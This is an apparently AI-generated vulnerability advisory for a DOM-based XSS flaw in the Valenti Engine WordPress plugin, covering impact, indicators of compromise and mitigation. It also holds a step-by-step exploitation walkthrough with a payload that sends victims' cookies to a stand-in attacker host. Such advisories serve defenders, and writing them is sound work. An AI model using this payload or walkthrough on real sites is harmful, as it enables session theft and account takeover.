CVE-2025-63021
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-63021 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the Valenti Engine WordPress plugin developed by codetipi. It affects all versions of the plugin through and including version 1.0.3. The vulnerability was disclosed on December 31, 2025, with the CVE assigned by Patchstack. It carries a CVSS v3.1 base score of 6.5 (Medium), assessed by Patchstack (Patchstack, Red Hat CVE).

Technical details

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and manifests specifically as DOM-Based XSS, meaning malicious script execution occurs client-side within the browser's DOM without necessarily involving server-side reflection. Exploitation requires an authenticated attacker (low privileges) who can supply crafted input that is subsequently processed and rendered unsafely by the plugin's JavaScript code. User interaction is required, meaning a victim must visit or interact with a page containing the malicious payload. No public proof-of-concept code has been identified at this time (Patchstack, Red Hat CVE).

Impact

Successful exploitation allows an authenticated attacker to inject and execute arbitrary JavaScript in the context of another user's browser session, potentially leading to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, or redirection to malicious sites. The vulnerability has a changed scope, meaning the impact can extend beyond the vulnerable component to affect other users of the same WordPress site. Confidentiality, integrity, and availability impacts are each rated Low, reflecting limited but real risk to affected users (Patchstack, Red Hat CVE).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-63021. The EPSS score is approximately 0.033%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access (low privilege level) and victim user interaction, which further limits the practical attack surface (Red Hat CVE).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Valenti Engine plugin (version ≤ 1.0.3) using tools such as WPScan or by inspecting plugin directories exposed via the target site.
  2. Obtain authenticated access: Register or log in to the target WordPress site with any low-privileged user account (e.g., subscriber or contributor role).
  3. Identify vulnerable input: Locate the plugin's input fields or parameters that are processed client-side by the plugin's JavaScript without proper sanitization.
  4. Craft malicious payload: Prepare a DOM-Based XSS payload such as <img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie> or a similar script designed to exfiltrate session cookies or perform actions on behalf of the victim.
  5. Deliver payload: Submit the crafted input through the vulnerable plugin interface (e.g., a form field, URL parameter, or stored content) so that it is rendered in the DOM when a victim visits the affected page.
  6. Victim interaction: Entice or wait for a higher-privileged user (e.g., administrator) to visit the page containing the injected payload, triggering script execution in their browser.
  7. Achieve objective: Collect exfiltrated session tokens, perform unauthorized actions, or pivot further within the application using the compromised session (Patchstack).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after visiting pages with Valenti Engine content; unusual GET/POST requests containing encoded JavaScript or Base64 strings in URL parameters.
  • Logs: WordPress access logs showing authenticated requests to plugin-related endpoints with anomalous or encoded input values; browser console errors related to unexpected script execution on Valenti Engine pages.
  • File System: Unexpected modifications to plugin files in wp-content/plugins/valenti-engine/ that may indicate tampering or persistence attempts following initial XSS exploitation.
  • Process/Application: Reports from users of unexpected redirects, pop-ups, or session logouts when visiting pages powered by the Valenti Engine plugin.

Mitigation and workarounds

Site administrators should update the Valenti Engine plugin to a version beyond 1.0.3 as soon as a patched release is available from the plugin developer (codetipi). If an update is not yet available, the recommended workaround is to deactivate and remove the plugin until a fix is released. Additionally, implementing a Web Application Firewall (WAF) with XSS filtering rules can help mitigate exploitation attempts in the interim. Restricting plugin access to trusted, authenticated users and monitoring for anomalous activity on affected pages are also advisable precautions (Patchstack, Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-78570CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78568CRITICAL9.8
  • totaldonations
NoNoAug 25, 2026
CVE-2026-78572HIGH8.1
  • kalles-addons
NoNoAug 25, 2026
CVE-2026-78576HIGH7.5
  • readabler
NoYesAug 25, 2026
CVE-2026-76128MEDIUM6.4
  • ecommerce-product-catalog
NoYesAug 25, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management